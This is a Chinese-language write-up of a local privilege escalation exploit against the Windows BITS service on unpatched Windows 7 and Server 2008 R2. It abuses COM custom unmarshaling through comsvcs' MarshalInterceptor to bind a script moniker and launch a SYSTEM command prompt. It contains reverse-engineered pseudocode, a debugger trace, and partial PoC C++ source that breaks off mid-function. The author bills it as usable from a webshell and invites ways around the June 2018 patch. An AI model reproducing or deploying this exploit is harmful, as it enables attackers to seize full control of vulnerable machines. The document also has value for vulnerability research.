分析过程
poc说明:可在未打微软2018年6月份安全补丁的win7x64,server2008r2x64运行,支持webshell模式,支持任意用户运行,运行后获得一个system权限的cmd,提供poc源码和编译后的exe。我的poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关。
前段部分介绍com组件的marshal原理有com基础的可以略过
在windows下有个以system权限运行的Background Intelligent Transfer Service服务(简称bits),调用bits服务的公开api中的IBackgroundCopyJob->SetNotifyInterface接口,我的利用方式是在poc中创建的类[CMarshaller],也就是SetNotifyInterface接口的参数Interface(远程com对象),因为这个类继承了IMarshal接口,bits为了获得这个Interface,bits最终会Unmarshal通过调用CoUnmarshalInterface
先看CoUnmarshalInterface逆向结果:
HRESULT __stdcall CoUnmarshalInterface(LPSTREAM pStm, const IID *const riid, IUnknown *ppv)
{
HRESULT result; // eax
CStdIdentity *hrTemp; // edi
IUnknown *v5; // esi
tagOBJREF objref; // [esp+14h] [ebp-5Ch]
if ( !pStm || !ppv )
return -2147024809;
ppv->vfptr = 0;
//先检查marshaler的Channe是不是建立
result = InitChannelIfNecessary();
if ( result >= 0 )
{
hrTemp = (CStdIdentity *)ReadObjRef(pStm, &objref);
if ( (signed int)hrTemp >= 0 )
{
//先获取用来UnmarshalInterface的com对象(Unmarshaler),这里我使用的是自定义CustomUnmarshaler
JUMPOUT(objref.flags & 4, 0, &CallGetCustomUnmarshaler);
// 这里传进去bypass还是0,根据之前CallGetCustomUnmarshaler获得的Unmarshaler
hrTemp = UnmarshalObjRef(&objref, (void **)&ppv->vfptr, 0, 0);
FreeObjRef(&objref);
if ( !InlineIsEqualGUID((_GUID *)riid, &GUID_NULL)
//objref中就包含当前要Unmarshale的UnmarshalClassID=objref.iid
&& !InlineIsEqualGUID((_GUID *)riid, &objref.iid)
&& (signed int)hrTemp >= 0 )
{
v5 = (IUnknown *)ppv->vfptr;
hrTemp = (CStdIdentity *)(*ppv->vfptr->QueryInterface)(ppv->vfptr, riid, ppv);
((void (__stdcall *)(IUnknown *))v5->vfptr->Release)(v5);
}
}
result = (HRESULT)hrTemp;
}
return result;
}
如果调用远程com对象QueryInterface得到他支持IMarshal接口,也就是返回HRESULT=S_OK后
首先调用IMarshal接口GetUnmarshalClass方法获取类的
UnmarshalClassID,看看是不是几种ole32自带的UnmarshalClassID如果不是根据UnmarshalClassID调用CoCreateInstance创建对应的com对象来unmarshal,这个com对象必须支持IMarshal接口,然后调用这个com对象的UnmarshalInterface方法;
我的POC返回[CLSID_QCMarshalInterceptor],也就是CMarshalInterceptor类的CLSID,这是bits服务会在自己进程创建中[CMarshalInterceptor]对应的实例,并用这个实例来UnmarshalInterface根据Stream中的数据包
HRESULT __stdcall GetCustomUnmarshaler(_GUID *rclsid, IStream *pStm, IMarshal **ppIM)
{
if ( InlineIsEqualGUID(&CLSID_StdWrapper, rclsid) || InlineIsEqualGUID(&CLSID_StdWrapperNoHeader, rclsid) )
return GetStaticWrapper(ppIM);
JUMPOUT(InlineIsEqualGUID(&CLSID_InProcFreeMarshaler, rclsid), 0, &loc_725CF958);
if ( InlineIsEqualGUID(&CLSID_ContextMarshaler, rclsid) )
return GetStaticContextUnmarshal(ppIM);
if ( InlineIsEqualGUID(&CLSID_AggStdMarshal, rclsid) )
return FindAggStdMarshal(pStm, ppIM);
//如果是自定义Unmarshal创建实例来UnmarshalInterface根据Stream中的数据包
return CoCreateInstance(rclsid, 0, (gCapabilities & 0x2000 | 0x806) >> 1, &IID_IMarshal, (LPVOID *)ppIM);
}
默认以标准marshal方式,Com组件默认的标准Marshal的就是CStdIdentity继承的类CStdMarshal来Unmarshal,获得的UnmarshalCLSID是CLSID_StdMarshal或CLSID_StdWrapperNoHeader或CLSID_AggStdMarshal
HRESULT __stdcall CStdMarshal::GetUnmarshalClass(CStdMarshal *this, _GUID *riid, void *pv, unsigned int dwDestCtx, void *pvDestCtx, unsigned int mshlflags, _GUID *pClsid)
{
GUID *v7; // esi
unsigned __int16 *v8; // esi
//MSHCTX_INPROC =3进程内marshal 或 MSHCTX_CROSSCTX =4同进程不同套间(CObjectContext不同)模式,不支持标准marshal
if ( ~(unsigned __int8)this->_dwFlags & 1 && dwDestCtx == 4 && !(mshlflags & 2)
|| ~(unsigned __int8)this->_dwFlags & 1 && dwDestCtx == 3 && IsThreadInNTA() && !(mshlflags & 2) )
{
v7 = &CLSID_StdWrapperNoHeader;
}
else
{
//这2种都是标准marshal
//第一种聚合marshal
v7 = &CLSID_AggStdMarshal;
if ( !(this->_dwFlags & 0x1000) )
//第二种聚合的标准marshal
v7 = &CLSID_StdMarshal;
}
pClsid->Data1 = v7->Data1;
v8 = &v7->Data2;
*(_DWORD *)&pClsid->Data2 = *(_DWORD *)v8;
v8 += 2;
*(_DWORD *)pClsid->Data4 = *(_DWORD *)v8;
*(_DWORD *)&pClsid->Data4[4] = *((_DWORD *)v8 + 1);
return 0;
}
//UnmarshalObjRef是CStdIdentity继承的类CStdMarshal的也就是默认的标准Unmarshal方式
CStdIdentity *__stdcall UnmarshalObjRef(tagOBJREF *objref, void **ppv, int fBypassActLock, CStdMarshal **ppStdMarshal)
{
HRESULT hrTemp; // eax
CObjectContext *canCallServerCtx; // eax
tagOBJREF *objrefTemp; // edi
CStdIdentity *hrFinal; // esi
CStdMarshal *CStdMarshalRef; // esi
CStdIdentity *stdity; // eax
void **ppvRef; // edi
tagStdUnmarshalData StdData; // [esp+Ch] [ebp-1Ch]
int fLightNAProxy; // [esp+24h] [ebp-4h]
objrefTemp = objref;
// fLightNAProxy=1就是crossctx,0就是sameapt
fLightNAProxy = CrossAptRefToNA(objref);
hrFinal = FindStdMarshal(objrefTemp, 0, (CStdMarshal **)&objref, fLightNAProxy);
if ( (signed int)hrFinal < 0 ) { // cPublicRefs引用如果大于0,就减少引用 if ( objrefTemp->u_objref.u_standard.std.cPublicRefs )
ReleaseMarshalObjRef(objrefTemp);
}
else
{
CStdMarshalRef = (CStdMarshal *)objref;
stdity = *(CStdIdentity **)objref->iid.Data4;
StdData.pobjref = objrefTemp;
ppvRef = ppv;
StdData.pStdID = stdity;
StdData.ppv = ppv;
StdData.pClientCtx = GetCurrentContext();
if ( ppStdMarshal )
{
*ppStdMarshal = CStdMarshalRef;
CStdMarshalRef->_selfMyMarshal._SelfMarshalVtbl->AddRef((IUnknown *)CStdMarshalRef);
}
// 里面是判断crossctx,里面ctx是不是不同
canCallServerCtx = CStdMarshal::ServerObjectCallable(CStdMarshalRef);
if ( canCallServerCtx )
{
//创建CStdWrapper包装自己
StdData.fCreateWrapper = ppvRef != 0;
// CStdMarshal::UnmarshalObjRef调用类型不同CStdMarshal模式中fBypassActLock为0就是false,传入的默认就是0
if ( fBypassActLock )
hrTemp = PerformCallback(
canCallServerCtx,
(HRESULT (__stdcall *)(void *))UnmarshalSwitch,
&StdData,
&IID_IEnterActivityWithNoLock,
2u,
0);
else
hrTemp = PerformCallback(
canCallServerCtx,
(HRESULT (__stdcall *)(void *))UnmarshalSwitch,
&StdData,
&IID_IMarshal,
6u,
0);
}
else
{
StdData.fCreateWrapper = fLightNAProxy;
// 最终都是调用CStdMarshal::UnmarshalObjRef
hrTemp = UnmarshalSwitch(&StdData);
}
hrFinal = (CStdIdentity *)hrTemp;
}
return hrFinal;
}
后段部分介绍导致poc结果执行的真正原因:
下面看下CMarshalInterceptor::UnmarshalInterface的逆向结果,首先判断数据包头和CLSID也就是CLSID_QCMarshalInterceptor
我做的结构UnmarshalInterface需要读出的头结构
struct MarshalInterceptorHeader
{
__int16 headersig;
__int16 headData;
__int32 headData2;
__int32 headData3;
IID *BuffIID;
};
union CutomMarshalInterceptorHeader
{
MarshalInterceptorHeader my_Head;
_GUID GUID_Head;
};
逆向结果代码:
HRESULT __userpurge CMarshalInterceptor::UnmarshalInterface( CMarshalInterceptor *this, LPSTREAM pStm, const struct _GUID *clsidFrom, void **ppv)
{
HRESULT result; // eax
int v6; // esi
int v8; // [esp+4h] [ebp-50h]
__int16 v9; // [esp+8h] [ebp-4Ch] MAPDST
int v10; // [esp+Ch] [ebp-48h]
const wchar_t *v11; // [esp+10h] [ebp-44h]
IID *v12; // [esp+14h] [ebp-40h]
int v13; // [esp+18h] [ebp-3Ch]
int v14; // [esp+1Ch] [ebp-38h]
int v15; // [esp+20h] [ebp-34h]
IPersistStream *IPersistStreamPPvRet; // [esp+2Ch] [ebp-28h]
CutomMarshalInterceptorHeader Header_Clsid; // [esp+30h] [ebp-24h]
*ppv = 0;
if ( !pStm )
return -2147024809;
Header_Clsid.my_Head.headersig = 0;
//先把第1个字节设为0
Header_Clsid.my_Head.headersig = 0;
memset(&Header_Clsid.my_Head.headData, 0, 0x1Cu);
v9 = 0;
//再读取12+16=26到Header_Clsid,前12位为sighead,后16位为CLSID=BuffIID
result = CMkUtil::Read(pStm, &Header_Clsid, 0x20u);
if ( result >= 0 )
{
if ( Header_Clsid.my_Head.headersig )
{
v14 = 0;
v9 = 37;
v11 = L”Version”;
v8 = -2147467259;
v10 = -1073605911;
v12 = (IID *)&Header_Clsid;
v13 = 32;
v15 = 1;
//失败记录日志
CError::WriteToLog(
(CError *)&v8,
L”d:\w7rtm\com\complus\src\comsvcs\qc\marshalinterceptor\marshalinterceptor.cpp”,
0x247u,
L”Version”);
result = -2147467259;
}
//比较BuffIID和CLSID_QCMarshalInterceptor是否相同,如果相同执行 CMarshalInterceptor::CreateRecorde
else if ( !memcmp(&CLSID_QCMarshalInterceptor, &Header_Clsid.my_Head.BuffIID, 0x10u) )
{
result = CMarshalInterceptor::CreateRecorder(pStm, clsidFrom, ppv);
}
else
{
//如果不相同根据BuffIID创建IPersistStream实例
IPersistStreamPPvRet = 0;
result = CoCreateInstance(
(const IID *const )&Header_Clsid.my_Head.BuffIID,
0,
0x417u,
&IID_IPersistStream,
(LPVOID *)&IPersistStreamPPvRet);
if ( result >= 0 )
{
//调用IPersistStream实例Load方法,读取到最终结果UnmarshalInterface的ppv;
v6 = ((int (__stdcall *)(IPersistStream *, LPSTREAM, void **))IPersistStreamPPvRet->_SelfMarshalVtbl->Load)(
IPersistStreamPPvRet,
pStm,
ppvref);
if ( v6 >= 0 )
//看看读出的ppv是否支持UnmarshalInterface传入的clsid
v6 = IPersistStreamPPvRet->_SelfMarshalVtbl->QueryInterface(
(IUnknown *)IPersistStreamPPvRet,
clsidFrom,
(IUnknown *)ppv);
((void (__cdecl *)(IPersistStream *))IPersistStreamPPvRet->_SelfMarshalVtbl->Release)(IPersistStreamPPvRet);
result = v6;
}
}
}
return result;
}
如果之前比较相同调用CMarshalInterceptor::CreateRecorder里面根据 CVE-2018-0824原理反序列化出一个Moniker,具体原因是看逆向结果是:
HRESULT __stdcall CMarshalInterceptor::CreateRecorder(LPSTREAM pStm, const struct _GUID *a2, IMoniker **ppvFinal)
{
HRESULT v3; // esi
int v4; // eax
const wchar_t *v5; // eax
unsigned int v7; // [esp-8h] [ebp-5Ch]
wchar_t *v8; // [esp-4h] [ebp-58h]
HRESULT v9; // [esp+14h] [ebp-40h]
__int16 v10; // [esp+18h] [ebp-3Ch]
int v11; // [esp+1Ch] [ebp-38h]
const wchar_t *v12; // [esp+20h] [ebp-34h]
int v13; // [esp+24h] [ebp-30h]
int v14; // [esp+28h] [ebp-2Ch]
int v15; // [esp+2Ch] [ebp-28h]
int v16; // [esp+30h] [ebp-24h]
LPSTREAM streamRef; // [esp+34h] [ebp-20h]
LPBC ppbc; // [esp+38h] [ebp-1Ch]
IMoniker *ppvMonikerRet; // [esp+3Ch] [ebp-18h]
CLSID pclsid; // [esp+40h] [ebp-14h]
*ppvFinal = 0;
pclsid.Data1 = 0;
*(_DWORD *)&pclsid.Data2 = 0;
*(_DWORD *)pclsid.Data4 = 0;
*(_DWORD *)&pclsid.Data4[4] = 0;
streamRef = pStm;
ppvMonikerRet = 0;
ppbc = 0;
//从流中读出Moniker的GUID(pclsid))
v3 = ReadClassStm(pStm, &pclsid);
if ( v3 >= 0 )
{
//判断是GUID是不是复合的Moniker(CompositeMoniker的GUID)),如果是加载复合moniker不是加载当前moniker
v4 = !memcmp(CLSID_CompositeMoniker, &pclsid, 0x10u) ? CMarshalInterceptor::LoadCompositeMoniker(
streamRef,
&ppvMonikerRet) : CMarshalInterceptor::LoadNonCompositeMoniker(
streamRef,
&pclsid,
(LPVOID *)&ppvMonikerRet);
v3 = v4;
if ( v4 >= 0 )
{
v3 = CreateBindCtx(0, &ppbc);
if ( v3 >= 0 )
{
读出moniker后并调用它的BindToObject方法,会启动moniker中的sct脚本
v3 = ppvMonikerRet->lpVtbl->BindToObject(ppvMonikerRet, ppbc, 0, a2, (void **)ppvFinal);
if ( v3 >= 0 )
goto LABEL_11;
v10 = 37;
v5 = L”BindToObject”;
v8 = L”BindToObject”;
v11 = -1073605911;
v7 = 832;
}
else
{
v10 = 37;
v5 = L”CreateBindCtx”;
v8 = L”CreateBindCtx”;
v11 = -1073606062;
v7 = 821;
}
v12 = v5;
v9 = v3;
v13 = 0;
v14 = 0;
v15 = 0;
v16 = 1;
//失败记录日志
CError::WriteToLog(
(CError *)&v9,
L”d:\w7rtm\com\complus\src\comsvcs\qc\marshalinterceptor\marshalinterceptor.cpp”,
v7,
v8);
}
}
LABEL_11:
if ( ppvMonikerRet )
{
ppvMonikerRet->lpVtbl->Release(ppvMonikerRet);
ppvMonikerRet = 0;
}
if ( ppbc )
ppbc->lpVtbl->Release(ppbc);
return v3;
}
//如果是复合Moniker就直接从流中读出Moniker,需要读2次,原因具体看逆向结果
int __stdcall CMarshalInterceptor::LoadCompositeMoniker(LPSTREAM pStm, struct IMoniker **ppvMonikerRet)
{
struct IMoniker **v2; // esi
int result; // eax
v2 = a2;
*buff = 0;
buff = 0;
result = CMkUtil::Read(pStm, &buff, 4u);
if ( result >= 0 )
{
如果读出的buff是02再次调用自身函数从流中读出ppvMonikerRet,这也就是流中要先写入02的原因
if ( (unsigned int)buff >= 2 )
result = CMarshalInterceptor::LoadAndCompose(pStm, (unsigned int)buff, ppvMonikerRet);
else
result = -2147418113;
}
return result;
}
如果不是复合Moniker就调用LoadNonCompositeMoniker就是通过moniker的CLSID创建一个新的moniker,逆向结果
HRESULT __stdcall CMarshalInterceptor::LoadNonCompositeMoniker(struct IStream *a1, IID *rclsid, LPVOID *ppv)
{
HRESULT result; // eax
//调用CoCreateInstance创建一个新的monike
result = CoCreateInstance(rclsid, 0, 0x415u, &IID_IMoniker, ppv);
if ( result >= 0 )
result = (*(int (__stdcall **)(LPVOID, struct IStream *))(*(_DWORD *)*ppv + 20))(*ppv, a1);
return result;
}
由于最新6月补丁在CMarshalInterceptor::UnmarshalInterface加入了验证判断需要验证tls所以直接返回错误,如果有读者发现绕过方法可以联系我
if ( !*(_BYTE *)(*(_QWORD *)(__readgsqword(0x58u) + 8i64 * (unsigned int)tls_index) + 1i64) )
{
v8 = -2147024891;
v9 = L”PlayerUnmarshaling”;
v21 = 0i64;
v22 = 0i64;
v10 = 567;
LABEL_21:
v17 = v8;
v19 = -1073605911;
v20 = v9;
v18 = 37;
v23 = 0;
v24 = 1;
CError::WriteToLog(
(CError *)&v17,
L”d:\w7rtm\com\complus\src\comsvcs\qc\marshalinterceptor\marshalinterceptor.cpp”,
v10,
v9);
return v8;
}
调试poc:
成功在CMarshalInterceptor::UnmarshalInterface:断下
Breakpoint 0 hit
comsvcs!CMarshalInterceptor::UnmarshalInterface:
000007ff7c0cb420 48895c2408 mov qword ptr [rsp+8],rbx ss:00000000011fe7d0=0000000000000000
windbg在scrobj模块加载时断下,截图
再次成功在kernel32!CreateProcessW:断下
0:003> g
Breakpoint 1 hit
kernel32!CreateProcessW:
查看栈回溯
00000000`78d405e0 e91b055587 jmp 00000000`00290b00
0:006> kb L100
RetAddr : Args to Child : Call Site
000007ff`2c07bfb4 : 00000000`00000000 000007ff`71f81982 00000d33`48538180 00000000`00000000 : kernel32!CreateProcessW
000007ff`2c07c463 : 00000000`00000000 00000000`0172d590 00000000`0172d590 00000000`0172d3d0 : wshom!CWshShell::CreateShortcut+0x310
000007ff`76881760 : 00000000`0172d5a8 00000000`008b2a4c 00000000`0024e078 00000000`00000000 : wshom!CWshShell::Exec+0x2b3
000007ff`76882582 : 000007ff`fffd4000 000007ff`76923a00 00000000`00000fff 000007ff`76882468 : OLEAUT32!DispCallFuncAmd64+0x60
000007ff`7688206a : 00000000`00250cb8 00000000`01ff5d28 00000000`00228570 00000000`00000000 : OLEAUT32!DispCallFunc+0x268
000007ff`2c0712c9 : 00000000`00a3f960 000007ff`768815cc 00000000`00211970 00000000`00000002 : OLEAUT32!CTypeInfo2::Invoke+0x3aa
000007ff`2c071211 : 000007ff`2c0711c4 00000000`00000208 00000000`00001f80 000007ff`756a26e8 : wshom!CDispatch::Invoke+0xad
00000000`0195860a : 00000000`00001f80 00000000`00010000 00000000`00000000 00000000`0172da10 : wshom!CWshEnvProcess::Invoke+0x4d
00000000`01959852 : 000007ff`fff40000 00000000`0172dac0 00000000`008aad50 00000000`0172e210 : jscript!VAR::InvokeByName+0x674
00000000`01959929 : 00000000`00000001 00000000`008aad50 00000000`00004000 00000000`008aad50 : jscript!VAR::InvokeDispName+0x72
00000000`019524b8 : 00000000`008add40 00000000`008b2bc2 00000000`0172eac0 00000000`00000001 : jscript!VAR::InvokeByDispID+0x1229
00000000`01958ec2 : 00000000`00000000 00000000`0172eac0 00000000`00000000 00000000`008ae710 : jscript!CScriptRuntime::Run+0x5a6
00000000`01958d2b : 00000000`008aa330 00000000`00000000 00000000`00000000 00000000`00000000 : jscript!ScrFncObj::CallWithFrameOnStack+0x162
00000000`01958b95 : 00000000`008aad50 00000000`008aad50 00000000`00000000 00000000`00a3f5a0 : jscript!ScrFncObj::Call+0xb7
00000000`0195e6b0 : 00000000`0008001f 00000000`00a3f5a0 00000000`008ad030 00000000`00000000 : jscript!CSession::Execute+0x19e
00000000`01951cb5 : 00000000`00000000 00000000`00a3f5a0 00000000`00000000 00000000`00000000 : jscript!COleScript::ExecutePendingScripts+0x17a
000007ff`30cc7186 : 00000000`008aa828 00000000`00000001 00000000`008ad030 00000000`4640f6a8 : jscript!COleScript::SetScriptState+0x61
000007ff`30cc7004 : 00000000`008ab3c0 00000000`008ab3c0 00000000`008a8160 00000000`008a8160 : scrobj!ComScriptlet::Inner::StartEngines+0xcf
000007ff`30cc6dc1 : 00000000`008aca40 00000000`008ab3c0 00000000`008a8160 00000000`00000000 : scrobj!ComScriptlet::Inner::Init+0x27a
000007ff`30cc6caa : 00000000`008a8160 00000000`00000000 00000000`00000000 00000000`00000000 : scrobj!ComScriptlet::New+0xca
000007ff`30cd1198 : 00000000`0172f440 00000000`01fc3580 00000000`00a3ef00 00000000`002574b8 : scrobj!ComScriptletConstructor::Create+0x68
000007ff`30cc1e33 : 00000000`0172f440 00000000`002535d0 00000000`00230d60 00000000`0172f440 : scrobj!ComScriptletFactory::CreateInstanceWithContext+0x240
000007ff`7a75f587 : 00000000`0172f320 000007ff`7a784060 00000000`0172f450 00000000`00000001 : scrobj!ComBuiltInFactory::CreateInstance+0x17
000007ff`7a623dbd : 00000000`0172f440 000007ff`7a788400 00000000`0172f440 000007ff`7a784030 : ole32!IClassFactory_CreateInstance_Stub+0x1b
000007ff`7febbb46 : 00000000`00000003 00000000`002535d0 000007ff`7a784048 00000000`00230d60 : ole32!IClassFactory_RemoteCreateInstance_Thunk+0x1d
000007ff`7fe10e76 : 00000000`00a3ef00 00000000`00000002 00000000`00a3f460 00000000`00000000 : RPCRT4!Ndr64StubWorker+0x761
000007ff`7a75d443 : 00000000`00000000 00000000`00000000 000007ff`7a791400 00000000`00208610 : RPCRT4!NdrStubCall3+0xb5
000007ff`7a75dcb9 : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00000000 : ole32!CStdStubBuffer_Invoke+0x5b
000007ff`7a75dc46 : 00000000`00230d60 00000000`011fe2b4 00000000`0022f950 000007ff`30ce7280 : ole32!SyncStubInvoke+0x5d
000007ff`7a61712f : 00000000`00230d60 00000000`00211970 00000000`002535d0 00000000`008ab250 : ole32!StubInvoke+0x185
000007ff`7a74fbf6 : 00000000`00000000 00000000`011fe2b4 00000000`01fadf50 00000000`002574b8 : ole32!CCtxComChnl::ContextInvoke+0x186
000007ff`7a62ea49 : 000007ff`7a76edd8 00000000`00000000 000007ff`7a7c3ca8 00000000`00205cc0 : ole32!MTAInvoke+0x26
000007ff`7a75d85c : 00000000`00211970 00000000`00000000 00000000`01fadf50 00000000`00230cd0 : ole32!STAInvoke+0x96
000007ff`7a75db6f : 00000000`d0908070 00000000`00211970 00000000`00000000 00000000`00214d00 : ole32!AppInvoke+0xe1
000007ff`7a75f872 : 00000000`00230cd0 00000000`00000400 00000000`00000000 00000000`00211d70 : ole32!ComInvokeWithLockAndIPID+0x4c1
000007ff`7a627059 : 00000000`00204288 00000000`00208610 00000000`00000000 00000000`00230cd0 : ole32!ComInvoke+0xae
000007ff`7a636d88 : 00000000`00211970 00000000`00230cd8 00000000`00000400 00000000`00000000 : ole32!ThreadDispatch+0x29
00000000`78c39bbd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ole32!ThreadWndProc+0x163
00000000`78c398c2 : 00000000`0172fe70 000007ff`7a626d68 000007ff`7a7bf7c0 00000000`00976fa0 : USER32!UserCallWinProcCheckWow+0x1ad
000007ff`7a626d0a : 00000000`000400ba 00000000`000400ba 000007ff`7a626d68 00000000`00000000 : USER32!DispatchMessageWorker+0x3b5
000007ff`7a74f5a7 : 00000000`00211970 00000000`00000000 00000000`00211970 000007ff`7a610c74 : ole32!CDllHost::STAWorkerLoop+0x68
000007ff`7a60380e : 00000000`00211970 00000000`00205540 00000000`00000000 00000000`00000000 : ole32!CDllHost::WorkerThread+0xd7
000007ff`7a5ff65a : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ole32!CRpcThread::WorkerLoop+0x1e
00000000`78d359cd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ole32!CRpcThreadCache::RpcWorkerThreadEntry+0x1a
00000000`78e7a561 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
最后触发最终结果的原因是 v3 = ppvMonikerRet->lpVtbl->BindToObject(ppvMonikerRet, ppbc, 0, a2, (void **)ppvFinal);
这个ppvMonikerRet就是我poc中创建的Moniker,它有一个Displayname,也就是我poc生成的sct文件,即script:xxx.sct,bits然后调用它的BindToObject方法会加载windows中scrobj.dll生成scriptmoniker并执行sct脚本,最终以bits自身权限启动一个cmd,如图,
我的poc源码:
//myguid
GUID IID_Imytestcom = { 0xE80A6EC1, 0x39FB, 0x462A, { 0xA5, 0x6C, 0x41, 0x1E, 0xE9, 0xFC, 0x1A, 0xEB } };
GUID IID_ITMediaControl = { 0xc445dde8, 0x5199, 0x4bc7, { 0x98, 0x07, 0x5f, 0xfb, 0x92, 0xe4, 0x2e, 0x09 } };
//ole32guid
GUID CLSID_AggStdMarshal2 = { 0x00000027, 0x0000, 0x0008, { 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
GUID CLSID_FreeThreadedMarshaller = { 0x0000033A, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
GUID CLSID_StubMYTestCom = { 0x00020424, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, } };
GUID IID_IStdIdentity = { 0x0000001b, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
GUID IID_IMarshalOptions = { 0X4C1E39E1, 0xE3E3, 0x4296, { 0xAA, 0x86, 0xEC, 0x93, 0x8D, 0x89, 0x6E, 0x92 } };
GUID CLSID_DfMarshal = { 0x0000030B, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
GUID IID_IStdFreeMarshal = { 0x000001d0, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
//GUID IID_IStdMarshalInfo = { 0x00000018, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,} };
//GUID IID_IExternalConnection = { 0x00000019, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,} };
//GUID IID_IStdFreeMarshal = { 0x000001d0, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
//GUID IID_IProxyManager = { 0x00000008, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
GUID CLSID_StdWrapper = { 0x00000336, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
GUID CLSID_StdWrapperNoHeader = { 0x00000350, 0x0000, 0x0000, { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
GUID IID_IObjContext = { 0x051372ae0, 0xcae7, 0x11cf, { 0xbe, 0x81, 0x00, 0xaa, 0x00, 0xa2, 0xfa, 0x25 } };
//program
static bstr_t IIDToBSTR(REFIID riid)
{
LPOLESTR str;
bstr_t ret = “Unknown”;
if (SUCCEEDED(StringFromIID(riid, &str)))
{
ret = str;
CoTaskMemFree(str);
}
return ret;
}
typedef HRESULT(__stdcall *CoCreateObjectInContext)(IUnknown *pServer, IUnknown *pCtx, _GUID *riid, void **ppv);
typedef HRESULT(__stdcall *CreateProxyFromTypeInfo)(ITypeInfo* pTypeInfo, IUnknown* pUnkOuter, REFIID riid, IRpcProxyBuffer** ppProxy, void** ppv);
typedef HRESULT(__stdcall *CreateStubFromTypeInfo)(ITypeInfo* pTypeInfo, REFIID riid, IUnknown* pUnkServer, IRpcStubBuffer** ppStub);
DEFINE_GUID(IID_ISecurityCallContext, 0xcafc823e, 0xb441, 0x11d1, 0xb8, 0x2b, 0x00, 0x00, 0xf8, 0x75, 0x7e, 0x2a);
DEFINE_GUID(IID_IObjectContext, 0x51372ae0, 0xcae7, 0x11cf, 0xbe, 0x81, 0x00, 0xaa, 0x00, 0xa2, 0xfa, 0x25);
_COM_SMARTPTR_TYPEDEF(IBackgroundCopyJob, __uuidof(IBackgroundCopyJob));
_COM_SMARTPTR_TYPEDEF(IBackgroundCopyManager, __uuidof(IBackgroundCopyManager));
class CMarshaller : public IMarshal
{
LONG _ref_count;
IUnknown * _unk;
~CMarshaller() {}
public:
CMarshaller(IUnknown * unk) : _ref_count(1)
{
_unk = unk;
}
virtual HRESULT STDMETHODCALLTYPE QueryInterface(
/* [in] */ REFIID riid,
/* [iid_is][out] */ _COM_Outptr_ void __RPC_FAR *__RPC_FAR *ppvObject)
{
*ppvObject = nullptr;
printf(“QI [CMarshaller] – Marshaller: %ls %pn”, IIDToBSTR(riid).GetBSTR(), this);
if (riid == IID_IUnknown)
{
*ppvObject = this;
}
else if (riid == IID_IMarshal)
{
*ppvObject = static_cast(this);
}
else
{
return E_NOINTERFACE;
}
printf(“Queried Success: %pn”, *ppvObject);
((IUnknown *)*ppvObject)->AddRef();
return S_OK;
}
virtual ULONG STDMETHODCALLTYPE AddRef(void)
{
printf(“AddRef: %dn”, _ref_count);
return InterlockedIncrement(&_ref_count);
}
virtual ULONG STDMETHODCALLTYPE Release(void)
{
printf(“Release: %dn”, _ref_count);
ULONG ret = InterlockedDecrement(&_ref_count);
if (ret == 0)
{
printf(“Release object %pn”, this);
delete this;
}
return ret;
}
virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(
/* [annotation][in] */
_In_ REFIID riid,
/* [annotation][unique][in] */
_In_opt_ void *pv,
/* [annotation][in] */
_In_ DWORD dwDestContext,
/* [annotation][unique][in] */
_Reserved_ void *pvDestContext,
/* [annotation][in] */
_In_ DWORD mshlflags,
/* [annotation][out] */
_Out_ CLSID *pCid)
{
printf(“Call: GetUnmarshalClassn”);
//bits服务先查询GetUnmarshalClass返回这个GUID
GUID marshalInterceptorGUID = { 0xecabafcb, 0x7f19, 0x11d2, { 0x97, 0x8e, 0x00, 0x00, 0xf8, 0x75, 0x7e, 0x2a } };
*pCid = marshalInterceptorGUID; // ECABAFCB-7F19-11D2-978E-0000F8757E2A
return S_OK;
}
virtual HRESULT STDMETHODCALLTYPE MarshalInterface(
/* [annotation][unique][in] */
_In_ IStream *pStm,
/* [annotation][in] */
_In_ REFIID riid,
/* [annotation][unique][in] */
_In_opt_ void *pv,
/* [annotation][in] */
_In_ DWORD dwDestContext,
/* [annotation][unique][in] */
_Reserved_ void *pvDestContext,
/* [annotation][in] */
_In_ DWORD mshlflags)
{
printf(“Marshal marshalInterceptorGUID Interface: %lsn”, IIDToBSTR(riid).GetBSTR());
GUID marshalInterceptorGUID = { 0xecabafcb, 0x7f19, 0x11d2, { 0x97, 0x8e, 0x00, 0x00, 0xf8, 0x75, 0x7e, 0x2a } };
printf(“Call: MarshalInterfacen”);
ULONG written = 0;
HRESULT hr = 0;
IMonikerPtr scriptMoniker;
IMonikerPtr newMoniker;
IBindCtxPtr context;
GUID compositeMonikerGUID = { 0x00000309, 0x0000, 0x0000, { 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } };
//流中需要的头结构数据
UINT header[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
UINT monikers[] = { 0x02, 0x00, 0x00, 0x00 };
